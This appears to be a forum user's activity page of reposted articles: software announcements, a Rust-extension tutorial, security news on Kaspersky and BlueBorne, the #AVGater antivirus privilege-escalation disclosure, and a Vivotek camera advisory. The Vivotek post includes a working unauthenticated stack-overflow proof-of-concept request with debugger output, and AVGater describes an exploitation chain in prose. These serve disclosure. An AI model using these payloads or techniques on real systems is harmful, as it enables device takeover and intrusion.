Jump to content

Fi8sVrs

Active Members
 View Profile  See their activity

  • Posts

    3206

  • Joined

  • Days Won

    87

 Content Type 

Everything posted by Fi8sVrs

  1. Fi8sVrs
    SQL Operations Studio SQL Operations Studio is a data management tool that enables working with SQL Server, Azure SQL DB and SQL DW from Windows, macOS and Linux. Download SQL Operations Studio Public Preview 1 Windows: https://go.microsoft.com/fwlink/?linkid=862648 macOS: https://go.microsoft.com/fwlink/?linkid=862647 Linux: https://go.microsoft.com/fwlink/?linkid=862646 Feature Highlights Cross-Platform DB management for Windows, macOS and Linux with simple XCopy deployment SQL Server Connection Management with Connection Dialog, Server Groups, and Registered Servers Object Explorer supporting schema browsing and contextual command execution T-SQL Query Editor with advanced coding features such as autosuggestions, error diagnostics, tooltips, formatting and peek definition Query Results Viewer with advanced data grid supporting large result sets, export to JSON\CSV\Excel, query plan and charting Management Dashboard supporting customizable widgets with drill-through actionable insights Visual Data Editor that enables direct row insertion, update and deletion into tables Backup and Restore dialogs that enables advanced customization and remote filesystem browsing, configured tasks can be executed or scripted Task History window to view current task execution status, completion results with error messages and task T-SQL scripting Scripting support to generate CREATE, SELECT and DROP statements for database objects Workspaces with full Git integration and Find In Files support to managing T-SQL script libraries Modern light-weight shell with theming, user settings, full screen support, integrated terminal and numerous other features Here's some of these features in action. Contributing If you are interested in fixing issues and contributing directly to the code base, please see the document How to Contribute, which covers the following: How to build and run from source The development workflow, including debugging and running tests Submitting pull requests This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments. Privacy Statement The Microsoft Enterprise and Developer Privacy Statement describes the privacy statement of this software. License Copyright (c) Microsoft Corporation. All rights reserved. Licensed under the Source EULA. Download: sqlopsstudio-master.zip or git clone https://github.com/Microsoft/sqlopsstudio.git Source: https://github.com/Microsoft/sqlopsstudio
  2. Fi8sVrs
    What is Rust? Rust is a systems programming language that runs blazingly fast, prevents segfaults, and guarantees thread safety. Featuring zero-cost abstractions move semantics guaranteed memory safety threads without data races trait-based generics pattern matching type inference minimal runtime efficient C bindings Description is taken from rust-lang.org. Why does it matter for a Python developer? The better description of Rust I heard from Elias (a member of the Rust Brazil Telegram Group). There is a bunch of Rust packages out there to help you extending Python with Rust. I can mention Milksnake created by Armin Ronacher (the creator of Flask) and also PyO3 The Rust bindings for Python interpreter. See a complete reference list at the bottom of this article. Let’s see it in action For this post, I am going to use Rust Cpython, it’s the only one I have tested, it is compatible with stable version of Rust and found it straightforward to use. Pros: It is easy to write Rust functions and import from Python and as you will see by the benchmarks it worth in terms of performance. Cons: The distribution of your project/lib/framework will demand the Rust module to be compiled on the target system because of variation of environment and architecture, there will be a compiling stage which you don’t have when installing Pure Python libraries, you can make it easier using rust-setuptools or using the MilkSnake to embed binary data in Python Wheels. Python is sometimes slow Yes, Python is known for being “slow” in some cases and the good news is that this doesn’t really matter depending on your project goals and priorities. For most projects, this detail will not be very important. However, you may face the rare case where a single function or module is taking too much time and is detected as the bottleneck of your project performance, often happens with string parsing and image processing. Example Let’s say you have a Python function which does a string processing, take the following easy example of counting pairs of repeated chars, but have in mind that this example can be reproduced with other string processing functions or any other generally slow process in Python. # How many subsequent-repeated group of chars are in the given string? abCCdeFFghiJJklmnopqRRstuVVxyZZ... {millions of chars here} 1 2 3 4 5 6 Python is slow for doing large string processing, so you can use pytest-benchmark to compare a Pure Python (with Iterator Zipping) function versus a Regexp implementation. # Using a Python3.6 environment $ pip3 install pytest pytest-benchmark Then write a new Python program called doubles.py import re import string import random # Python ZIP version def count_doubles(val): total = 0 # there is an improved version later on this post for c1, c2 in zip(val, val[1:]): if c1 == c2: total += 1 return total # Python REGEXP version double_re = re.compile(r'(?=(.)\1)') def count_doubles_regex(val): return len(double_re.findall(val)) # Benchmark it # generate 1M of random letters to test it val = ''.join(random.choice(string.ascii_letters) for i in range(1000000)) def test_pure_python(benchmark): benchmark(count_doubles, val) def test_regex(benchmark): benchmark(count_doubles_regex, val) Run pytest to compare: $ pytest doubles.py ============================================================================= platform linux -- Python 3.6.0, pytest-3.2.3, py-1.4.34, pluggy-0.4. benchmark: 3.1.1 (defaults: timer=time.perf_counter disable_gc=False min_roun rootdir: /Projects/rustpy, inifile: plugins: benchmark-3.1.1 collected 2 items doubles.py .. ----------------------------------------------------------------------------- Name (time in ms) Min Max Mean ----------------------------------------------------------------------------- test_regex 24.6824 (1.0) 32.3960 (1.0) 27.0167 (1.0) test_pure_python 51.4964 (2.09) 62.5680 (1.93) 52.8334 (1.96) ----------------------------------------------------------------------------- Lets take the Mean for comparison: Regexp – 27.0167 <– less is better Python Zip – 52.8334 Extending Python with Rust Create a new crate crate is how we call Rust Packages. Having rust installed (recommended way is Rust is https://www.rustup.rs/ )also available on Fedora and RHEL repositories by the rust-toolset I used rustc 1.21.0 In the same folder run: cargo new pyext-myrustlib It creates a new Rust project in that same folder called pyext-myrustlib containing the Cargo.toml (cargo is the Rust package manager) and also a src/lib.rs (where we write our library implementation). Edit Cargo.toml It will use the rust-cpython crate as dependency and tell cargo to generate a dylib to be imported from Python. [package] name = "pyext-myrustlib" version = "0.1.0" authors = ["Bruno Rocha <rochacbruno@gmail.com>"] [lib] name = "myrustlib" crate-type = ["dylib"] [dependencies.cpython] version = "0.1" features = ["extension-module"] Edit src/lib.rs What we need to do: Import all macros from cpython crate. Take Python and PyResult types from CPython into our lib scope. Write the count_doubles function implementation in Rust, note that this is very similar to the Pure Python version except for: It takes a Python as first argument, which is a reference to the Python Interpreter and allows Rust to use the Python GIL. Receives a &str typed val as reference. Returns a PyResult which is a type that allows the rise of Python exceptions. Returns an PyResult object in Ok(total) (Result is an enum type that represents either success (Ok) or failure (Err)) and as our function is expected to return a PyResult the compiler will take care of wrapping our Ok on that type. (note that our PyResult expects a u64 as return value). Using py_module_initializer! macro we register new attributes to the lib, including the __doc__ and also we add the count_doubles attribute referencing our Rust implementation of the function. Attention to the names libmyrustlib, initlibmyrustlib, and PyInit. We also use the try! macro, which is the equivalent to Python’stry.. except. Return Ok(()) – The () is an empty result tuple, the equivalent of None in Python. #[macro_use] extern crate cpython; use cpython::{Python, PyResult}; fn count_doubles(_py: Python, val: &str) -> PyResult<u64> { let mut total = 0u64; // There is an improved version later on this post for (c1, c2) in val.chars().zip(val.chars().skip(1)) { if c1 == c2 { total += 1; } } Ok(total) } py_module_initializer!(libmyrustlib, initlibmyrustlib, PyInit_myrustlib, |py, m | { try!(m.add(py, "__doc__", "This module is implemented in Rust")); try!(m.add(py, "count_doubles", py_fn!(py, count_doubles(val: &str)))); Ok(()) }); Now let’s build it with cargo $ cargo build --release Finished release [optimized] target(s) in 0.0 secs $ ls -la target/release/libmyrustlib* target/release/libmyrustlib.d target/release/libmyrustlib.so* <-- Our dylib is here Now let’s copy the generated .so lib to the same folder where our doubles.py is located. NOTE: on Fedora you must get a .so in other system you may get a .dylib and you can rename it changing extension to .so. $ cd .. $ ls doubles.py pyext-myrustlib/ $ cp pyext-myrustlib/target/release/libmyrustlib.so myrustlib.so $ ls doubles.py myrustlib.so pyext-myrustlib/ Having the myrustlib.so in the same folder or added to your Python path allows it to be directly imported, transparently as it was a Python module. Importing from Python and comparing the results Edit your doubles.py now importing our Rust implemented version and adding a benchmark for it. import re import string import random import myrustlib # <-- Import the Rust implemented module (myrustlib.so) def count_doubles(val): """Count repeated pair of chars ins a string""" total = 0 for c1, c2 in zip(val, val[1:]): if c1 == c2: total += 1 return total double_re = re.compile(r'(?=(.)\1)') def count_doubles_regex(val): return len(double_re.findall(val)) val = ''.join(random.choice(string.ascii_letters) for i in range(1000000)) def test_pure_python(benchmark): benchmark(count_doubles, val) def test_regex(benchmark): benchmark(count_doubles_regex, val) def test_rust(benchmark): # <-- Benchmark the Rust version benchmark(myrustlib.count_doubles, val) Benchmark $ pytest doubles.py ============================================================================== platform linux -- Python 3.6.0, pytest-3.2.3, py-1.4.34, pluggy-0.4. benchmark: 3.1.1 (defaults: timer=time.perf_counter disable_gc=False min_round rootdir: /Projects/rustpy, inifile: plugins: benchmark-3.1.1 collected 3 items doubles.py ... ----------------------------------------------------------------------------- Name (time in ms) Min Max Mean ----------------------------------------------------------------------------- test_rust 2.5555 (1.0) 2.9296 (1.0) 2.6085 (1.0) test_regex 25.6049 (10.02) 27.2190 (9.29) 25.8876 (9.92) test_pure_python 52.9428 (20.72) 56.3666 (19.24) 53.9732 (20.69) ----------------------------------------------------------------------------- Lets take the Mean for comparison: Rust – 2.6085 <– less is better Regexp – 25.8876 Python Zip – 53.9732 Rust implementation can be 10x faster than Python Regex and 21x faster than Pure Python Version. Interesting that Regex version is only 2x faster than Pure Python 🙂 NOTE: That numbers makes sense only for this particular scenario, for other cases that comparison may be different. Updates and Improvements After this article has been published I got some comments on r/python and also on r/rust The contributions came as Pull Requests and you can send a new if you think the functions can be improved. Thanks to: Josh Stone we got a better implementation for Rust which iterates the string only once and also the Python equivalent. Thanks to: Purple Pixie we got a Python implementation using itertools, however this version is not performing any better and still needs improvements. Iterating only once fn count_doubles_once(_py: Python, val: &str) -> PyResult<u64> { let mut total = 0u64; let mut chars = val.chars(); if let Some(mut c1) = chars.next() { for c2 in chars { if c1 == c2 { total += 1; } c1 = c2; } } Ok(total) } def count_doubles_once(val): total = 0 chars = iter(val) c1 = next(chars) for c2 in chars: if c1 == c2: total += 1 c1 = c2 return total Python with itertools import itertools def count_doubles_itertools(val): c1s, c2s = itertools.tee(val) next(c2s, None) total = 0 for c1, c2 in zip(c1s, c2s): if c1 == c2: total += 1 return total New Results ------------------------------------------------------------------------------- Name (time in ms) Min Max Mean ------------------------------------------------------------------------------- test_rust_once 1.0072 (1.0) 1.7659 (1.0) 1.1268 (1.0) test_rust 2.6228 (2.60) 4.5545 (2.58) 2.9367 (2.61) test_regex 26.0261 (25.84) 32.5899 (18.45) 27.2677 (24.20) test_pure_python_once 38.2015 (37.93) 43.9625 (24.90) 39.5838 (35.13) test_pure_python 52.4487 (52.07) 59.4220 (33.65) 54.8916 (48.71) test_itertools 58.5658 (58.15) 66.0683 (37.41) 60.8705 (54.02) ------------------------------------------------------------------------------- The new Rust implementation is 3x better than the old, but the python-itertools version is even slower than the pure python After adding the improvements to iterate the list of chars only once, Rust still has advantage from 1.1268 to 39.583 Conclusion Rust may not be yet the general purpose language of choice by its level of complexity and may not be the better choice yet to write common simple applications such as web sites and test automation scripts. However, for specific parts of the project where Python is known to be the bottleneck and your natural choice would be implementing a C/C++ extension, writing this extension in Rust seems easy and better to maintain. There are still many improvements to come in Rust and lots of others crates to offer Python <--> Rust integration. Even if you are not including the language in your tool belt right now, it is really worth to keep an eye open to the future! References The code snippets for the examples showed here are available in GitHub repo: https://github.com/rochacbruno/rust-python-example. The examples in this publication are inspired by Extending Python with Rust talk by Samuel Cormier-Iijima in Pycon Canada. video here: Also by My Python is a little Rust-y by Dan Callahan in Pycon Montreal. video here: Other references: https://github.com/mitsuhiko/snaek https://github.com/PyO3/pyo3 https://pypi.python.org/pypi/setuptools-rust https://github.com/mckaymatt/cookiecutter-pypackage-rust-cross-platform-publish http://jakegoulding.com/rust-ffi-omnibus/ https://github.com/urschrei/polylabel-rs/blob/master/src/ffi.rs https://bheisler.github.io/post/calling-rust-in-python/ https://github.com/saethlin/rust-lather Join Community Join Rust community, you can find group links in https://www.rust-lang.org/en-US/community.html. If you speak Portuguese, I recommend you to join https://t.me/rustlangbr and there is the http://bit.ly/canalrustbr on Youtube. Author Bruno Rocha Senior Quality Engineer at Red Hat Teaching Python and Flask at CursoDePython.com.br Fellow Member of Python Software Foundation Member of RustBR study group M0ore info: http://about.me/rochacbruno and http://brunorocha.org Source
  3. Fi8sVrs
    Eugene Kaspersky has denied his company has worked with the Kremlin to hack others The Russian-headquartered anti-virus company Kaspersky Lab has hit back at reports it deliberately extracted sensitive files from a US National Security Agency worker's computer. The allegations stem from a Wall Street Journal report in early October. Russian hackers had used Kaspersky software to identify classified files on the NSA contractor's home computer, which they then stole, it said. It later emerged Kaspersky had also copied files off the PC itself. An NSA contractor was said to have installed Kaspersky's software on a personal computer But the company has now said this was not deliberate and any classified documents were destroyed. It said its researchers had been investigating malicious software created by "the Equation Group", which is widely understood to be Kaspersky's codeword for the NSA. And this research had included looking for signatures relating to known Equation activity on machines running the company's software. On 11 September 2014, the company said, one of its products deployed on a home computer with an internet protocol (IP) address in Baltimore, Maryland - close to where the NSA is based - had reported what appeared to be variants of the malware used by the Equation Group. Kaspersky Lab denies sharing any of the copied archive's files with third parties Soon after, the user had disabled the Kaspersky Lab anti-virus tool and downloaded and installed pirated software infected with another, separate form of malware. And when the Kaspersky product had been re-activated, it had also detected this malware and new variants of Equation malware inside a 7zip archive - a file containing compressed documents. This had been sent back to Kaspersky Lab and found to contain known and unknown Equation tools, source code and classified documents, indicating the user of the computer had been not a victim of Equation but one of its authors. Eugene Kaspersky, the company's founder and chief executive, had then ordered the classified data should be deleted from the company's systems, and within days it had been. The scandal overshadowed Kaspersky's 20th anniversary celebrations earlier this month Kaspersky had kept only the malware "binaries", computer code necessary to improve protection for its customers. The Wall Street Journal report had said the Russian government had secretly scanned computers using Kaspersky software to spy on the US government - not necessarily with the company's knowledge. Israeli intelligence Kaspersky denies creating "signatures" specifically designed to search for top secret or classified material. And it has now said the only third-party intrusion in its networks was by Duqu 2.0 - malware linked to Israeli intelligence. Following the Wall Street Journal report, the New York Times had reported that Israel had penetrated Kaspersky's networks in 2014 and alerted the US to the possibility of Kaspersky software being used for espionage. Kaspersky has also said the separate form of malware not linked to the Equation Group that it had detected on the Maryland PC, had been Smoke Bot or Smoke Loader, a Trojan created by a Russian hacker in 2012 and sold on Russian underground forums. Prime target And during this period the command-and-control servers of this malware were registered to what appeared to be a Chinese entity. US federal agencies have now been told to remove all Kaspersky software from their computers. Via bbc.com
  4. Fi8sVrs
    Awesome Coding Videos Learn to code by watching free awesome video courses Source: www.awesomecodingvideos.com
      • 2
      • Upvote
  5. Fi8sVrs
    Background Recently while writing and testing some email related code I got annoyed and decided to make an easier way to automate listening for emails and performing actions when they arrive. The result is websocket.email and to demonstrate how easy it is to use, let's make an email controlled gate opener using a raspberry pi and a tiny shell script. The hardware A gate. A gate opener. A raspberry pi 3 with linux installed. A raspberry pi GPIO 'cobbler' breadboard adapter. A breadboard. An NPN transistor and a 1k resistor. The abridged theory When the button is pressed circuit is powered, opening the gate. Transistors also can be configured to be an electronically controlled switch and we can programmatically control the general purpose input/output pins of a raspberry pi to drive the transistor. This gives us the following circuit: Assembly Replace the gate opener battery with the power supply on the breadboard using a soldering iron and solder, remember to write down which terminal is positive/negative. Replace the button with a transistor (Use a multimeter and google to work out which way it goes.) and resistor using a soldering iron and solder. Connect the gate opener input, power and ground into the bread board and match it up with the labels on the 'cobbler'. Connect 'cobbler' to the raspberry pi and breadboard. voila: The software wsemail compiled for the raspberry pi 3. A free api token generated from websocket.email. Combined with the following bash script running on the raspberry pi 3: #! /bin/sh set -u export WEBSOCKETEMAIL_TOKEN=$(cat websocketemail_token.txt) # A secret id that people can't guess gateid=gate12345 # initialize gpio echo 13 > /sys/class/gpio/export echo out > /sys/class/gpio/gpio13/direction while true do if wsemail -timeout 0 -for-address $gateid@websocket.email \ | grep -q "open sesame" then # Trigger the gate if the email contained the secret incantation echo 1 > /sys/class/gpio/gpio13/value sleep 0.1 echo 0 > /sys/class/gpio/gpio13/value fi # don't loop too fast if there is an error somewhere. sleep 1 done The code can be summarized as: Initialize passwords and GPIO. Loop forever waiting for an email to be sent to gate12345@websocket.email with the contents "open sesame". If the password is correct, pulse the GPIO switch, triggering the gate to open. The code is MIT licensed on github. The result Step aside Amazon IOT, you are doing it wrong. Also, I know my email address is in the video, send me nice comments Conclusion Interacting with the real world using software is a lot of fun and I encourage you to have a try at building something for yourself. These days you do not need to be an expert in electronics to make something that interacts with the physical world. websocket.email also did it's job well, and I hope it can also be useful anywhere you need to interact with email accounts ... perhaps even unit/integration tests at your software job... wink wink. Happy hacking! FAQ What do you mean 20 lines of code... There is go code in there!? 20 lines of shell needed to solve the task at hand, wsemail is reusable, just like your OS kernel, cat and all the other software it also used that you didn't complain about... though you aren't totally wrong. Why you wouldn't you setup an smtp server on the device? Why add websocket crap? NAT makes things annoying if you run the smtp server on the device, but I did setup an smtp server, and made a tiny api for it too :). Feel free to setup your own smtp server and use that instead. Why you wouldn't you use IMAP to poll the server? Which server? which account? Am I retaining emails? Sounds annoying. In my opinion the current configuration is a bit simpler for this use case. Source: acha.ninja
  6. Fi8sVrs
    Following the disclosure of the BlueBorne attack vector this past September, Armis discovered that critical Bluetooth vulnerabilities impact the Amazon Echo and Google Home. These new IoT voice-activated Personal Assistants join the extensive list of affected devices. Personal Assistants are rapidly expanding throughout the home and workplace, with an estimated 15 million Amazon Echo and 5 million Google Home devices sold. Since these devices are unmanaged and closed sourced, users are unaware of the fact their Bluetooth implementation is based on potentially vulnerable code borrowed from Linux and Android. Which BlueBorne Vulnerabilities Impact the Devices? Amazon Echo devices are affected by two vulnerabilities: Remote code execution vulnerability in the Linux Kernel (CVE-2017-1000251) Information leak vulnerability in the SDP Server (CVE-2017-1000250) Other Echo products are affected by either the vulnerabilities found in Linux or those discovered in Android, since different Echo’s variants use different OSs. Google Home devices are affected by one vulnerability: Information leak vulnerability in Android’s Bluetooth stack (CVE-2017-0785) These vulnerabilities can lead to a complete take over of the device in the case of the Amazon Echo, or lead to DoS of the Home’s Bluetooth communications. What is the risk? These devices are constantly listening to Bluetooth communications. There is no way to put an agent/antivirus on these devices. And given their limited UI, there is no way to turn their Bluetooth off – as is the case of other IoT devices (Smart TVs for example). With BlueBorne, hackers can take complete control over a vulnerable device, and use it for a wide range of malicious purposes; including spreading malware, stealing sensitive information and more. According to a recent survey of Armis clients and deployments, 82% of companies (including the F1000 and G2000) have an Amazon Echo device in their corporate environment. In many cases, Corporate IT may not be aware that these IoT devices are even on the network. Given that airborne attacks are virtually invisible to traditional security solutions, a hacker only needs to exploit one device to penetrate further into a network or spread to other devices. It is also worth mentioning that this is the first severe remote vulnerability found to affect the Amazon Echo, which was an impregnable wall up until now, with the only known vulnerability requiring an extensive physical attack. Quick demo of how BlueBorne can be used to take control of an Amazon Echo: Updates Have Been Provided Armis has notified both Amazon and Google about the findings, and both companies have issued automatic updates for the Amazon Echo and Google Home. “Customer trust is important to us and we take security seriously. Customers do not need to take any action as their devices will be automatically updated with the security fixes,” says Amazon. Amazon Echo users can verify that their devices are using version that is newer than v591448720, to validate they have received the patch. Protecting IoT and Unmanaged Devices The main concern arising from these new discoveries is this – what other devices are vulnerable? Unlike in the PC and mobile world, in which two or three main OSs control the absolute majority of the market, for IoT (or unmanaged) devices, no such dominant players exist. This creates an environment even more fragmented than the one currently seen with Android operating systems. A individual or company using an IoT device has no way of knowing whether a new discovered vulnerability will affect them. If there is a patch, there may be a significant delay in getting the patch or it may be very complicated to apply. Too often, no patch is provided. The Amazon Echo and Google Home are the better examples as they were patched, and did not need user interaction to update. However, the vast bulk of IoT devices cannot be updated. However, even the Echos and the Homes will eventually be replaced by new hardware versions (as Amazon and Google recently announced), and eventually the old generations will not receive updates – potentially leaving them susceptible to attacks indefinitely. Amazon Echo is based on an old Linux Kernel version, and the Google Home is based on Android. The reason both companies chose to integrate their Bluetooth implementations from external sources is quite obvious – it is a complex protocol which was difficult to implement in the first place. It is more efficient to use the code is embedded in the proprietary systems. However, it is not updated every time a new version is released. This means the device remains vulnerable to archaic attacks. Moreover, developers often refrain from implementing basic security measures such as stack protectors since they can be inconvenient, making the hacker’s job much easier. IoT devices are no longer a negligible threat. They are becoming a cornerstone in every corporate environment and network. These personal assistants are increasingly popular with businesses. The Wynn Hotel in Las Vegas announced it will install an Amazon Echo in every room on the premises. The Best Western and Marriott hotels are considering doing the same thing, which will provide productivity and potential risks to consumers and business travelers. This trend which will only increase in coming years. IoT devices are not only more prevalent today, but also subject to more attack vectors, with virtually no protection. The airborne attack vector is posing a severe threat to all IoT devices, and is completely overlooked by traditional security measures. Aside of BlueBorne, new Wi-Fi vulnerabilities were found in Broadcom’s chips (Broadpwn), as well as in the WPA2 protocol itself with the most recent Krack Attack. Users and businesses should treat IoT devices like any other device in their network, and implement proper protections. For more information, or to perform a full IoT Security Assessment of your company, visit armis.com. Via armis.com
  7. Fi8sVrs
    As you may have noticed, it has been quite still here for a while. This was related to the preparations for this release: A post disclosing a new type of vulnerability, affecting multiple Anti-Virus solutions. To summaries: Today, I’m disclosing an issue, that can be exploited by any local user to gain full control over the endpoint by abusing the restore from quarantine Anti-Virus feature. And because every new vulnerability needs its own name and logo, I want to introduce you to #AVGater: The Basics But let’s get back on track, by discussing a few Anti-Virus basics. The following diagram shows the inner workings of a typical AV from an unprivileged user’s point of view. There are three different access domains: The kernel mode, the privileged user mode (SYSTEM) and the unprivileged user mode. As shown in the following image, the different components have widely different duties: Within the context of the unprivileged user there is only the AV user interface. By itself, it has no real power, because its executing within a limited user session. However, by talking to the AV Windows service it can do many things a normal user would not be able too. For example it may be allowed to restore files from the virus quarantine (This could be a hint – Couldn’t it?). Additionally there is kernel component. Most likely it’s doing the real work of checking objects for known threat identifiers. The Idea So what’s the real point here? Well, if a non-privileged user would be able to manipulate any of the communication channels that cross security boundaries (unprivileged user mode to privileged user mode or privileged user mode to kernel mode) he could escalate his privileges. But how to do that? In the case of #AVGater, the answer to this question is: By manipulating the restore process from the virus quarantine: As shown in the above video, #AVGater can be used to restore a previously quarantined file to any arbitrary filesystem location. This is possible because the restore process is most often carried out by the privileged AV Windows user mode service. Hence, file system ACLs can be circumvented (as they don’t really count for the SYSTEM user). This type of issue is called a privileged file write vulnerability and can be used to place a malicious DLL anywhere on the system. The goal is to side load this library for a legitimate Windows servers by abusing the DLL Search Order: If this succeeds, arbitrary code can be executed with the help of the DLLMain entry point. But there is still one very important question still unanswered: How is it possible to tamper with the restore process? The solution are NTFS directory junctions. They are basically symbolic links for directories that can be created by anyone with the help of mklink. #AVGater in plain english: By abusing NTFS directory junctions, the AV quarantine restore process can be manipulated, so that previously quarantined files can be written to arbitrary file system locations. Puttin it all together With all this knowledge, we can now paint a complete attack scenario: First a malicious library is moved to the AV quarantine. Then, by abusing directory junctions the original source path is redirected to another destination. Most likely a folder within C:\Program Files or C:\Windows. By restoring the previously quarantined file, the SYSTEM permissions of the AV Windows user mode service are misused, and the malicious library is placed in a folder where the currently signed in user is unable to write to under normal conditions. Because of how the DLL search order works, it is finally loaded by another privileged Windows process. Thereby the code within the DLLMain of the malicious library is executed. Hence, a local non-admin attacker gained full control over the affected endpoint. Here’s a diagram illustrating the whole process: During the preparation for this public disclosure, several different product have been checked for #AVGater. The following vendors have already released their fix. However, there are a few more to come! Who is/was affected? If anyone finds additional vulnerable products, please contact me. I will report them and update this list as soon as they fixed the issue. Getting our hands dirty If you want to know more about how to exploit #AVGator in a real life scenario, I have a good news for you: I already fully documented two exploit vectors: Local Privilege Escalation in Emsisoft Anti-Malware by abusing NTFS Directory Junctions #AVGater Local Privilege Escalation in Malwarebytes 3 by abusing NTFS Directory Junctions #AVGater Additionally, here are the slides of my talk “When your anti virus turns against you” from the IT SECX conference. How to protect myself? Generally, it’s pretty simple: Always install updates in a timely manner. However, as some vendors still need a few more days to release their fix, it may take a little till everyone is protected. Furthermore, as #AVGator can only be exploited if the user is allowed to restore previously quarantined file, I recommend everyone within a corporate environment to block normal users from restoring identified threats. This is wise in any way. Source
  8. Fi8sVrs
    Many Vivotek IP cameras suffer from a remote stack overflow vulnerability. Device models include CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377, IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564, MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, and VC8101. [STX] Subject: Vivotek IP Cameras - Remote Stack Overflow Researcher: bashis <mcw noemail eu> (September-October 2017) PoC: https://github.com/mcw0/PoC Release date: November 13, 2017 Full Disclosure: 43 days Attack Vector: Remote Authentication: Anonymous (no credentials needed) Firmware Vulnerable: Only 2017 versions affected Firmware Patched: October 2017 and higher Device Model: CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377, IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564, MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, VC8101... and possible more Download Updated Firmware: http://www.vivotek.com/firmware/ [Timeline] October 1, 2017: Reported findings with all details to Vivotek Cybersecurity October 2, 2017: First response from Vivotek October 5, 2017: ACK of findings from Vivotek October 11, 2017: Vivotek reported first fixed Firmware October 12, 2017: After request, Vivotek provided samples of fixed Firmware October 17, 2017: Verified fixed Firmware, Vivotek thanking for the help October 30, 2017: Noticed new Firmware released, pinged to get some info about their advisory November 1, 2017: Agreed on publication November 13, 2017 November 9, 2017: Checked few release notes, none mention security fix; pinged Vivotek with the question why not. November 13, 2017: No reply from Vivotek, Full Disclosure as planned. [Details] Vivotek using modified version of Boa/0.94.14rc21, and the vulnerability has been introduced by Vivotek. The stack overflow is triggered by "PUT" or "POST" request: [PUT|POST] /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n However, the absolutely minimal request to trigger the stack overflow is weird, most probably due to quick hack: "[PUT|POST]Content-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" This allows us to insert [JUNK] with 'Good bytes' up to 9182 bytes (0x1FFF) of the request: "[PUT|POST][JUNK]Content-Length[JUNK]:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" Notes: 1. B to I = $R4-$R11; X = $PC 2. Size of request availible in $R3 at the LDMFD 3. Max request size: 9182 bytes (0x1FFF) 4. "Start with "\n" in "\n\r\n\r\n" needed to jump with 0x00xxxxxx (if not $PC will be 0x0dxxxxxx) 5. Space (0x20) after ':' in 'Content-Length:' counting as one char of the 20 bytes 6. Stack not protected with "Stack canaries" 7. Good bytes: 0x01-0x09, 0x0b-0xff; Bad bytes: 0x00, 0x0a; 8. heap: Non-executable + Non-ASLR 9. stack: Non-executable + ASLR [PoC] $ echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80 (gdb) target remote 192.168.57.20:23946 Remote debugging using 192.168.57.20:23946 0x76eb2c5c in ?? () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x58585858 in ?? () (gdb) bt #0 0x58585858 in ?? () #1 0x000188f4 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) i reg r0 0x1 1 r1 0x47210 291344 r2 0x0 0 r3 0x75 117 r4 0x42424242 1111638594 r5 0x43434343 1128481603 r6 0x44444444 1145324612 r7 0x45454545 1162167621 r8 0x46464646 1179010630 r9 0x47474747 1195853639 r10 0x48484848 1212696648 r11 0x49494949 1229539657 r12 0x1 1 sp 0x7e92dac0 0x7e92dac0 lr 0x188f4 100596 pc 0x58585858 0x58585858 cpsr 0x60000010 1610612752 (gdb) $ echo -en "PUTContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80 (gdb) target remote 192.168.57.20:23946 Remote debugging using 192.168.57.20:23946 0x76e82c5c in ?? () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x58585858 in ?? () (gdb) bt #0 0x58585858 in ?? () #1 0x000188f4 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) i reg r0 0x1 1 r1 0x47210 291344 r2 0x0 0 r3 0x4f 79 r4 0x42424242 1111638594 r5 0x43434343 1128481603 r6 0x44444444 1145324612 r7 0x45454545 1162167621 r8 0x46464646 1179010630 r9 0x47474747 1195853639 r10 0x48484848 1212696648 r11 0x49494949 1229539657 r12 0x1 1 sp 0x7ec9cac0 0x7ec9cac0 lr 0x188f4 100596 pc 0x58585858 0x58585858 cpsr 0x60000010 1610612752 (gdb) Have a nice day /bashis [ETX] Source
  9. Fi8sVrs
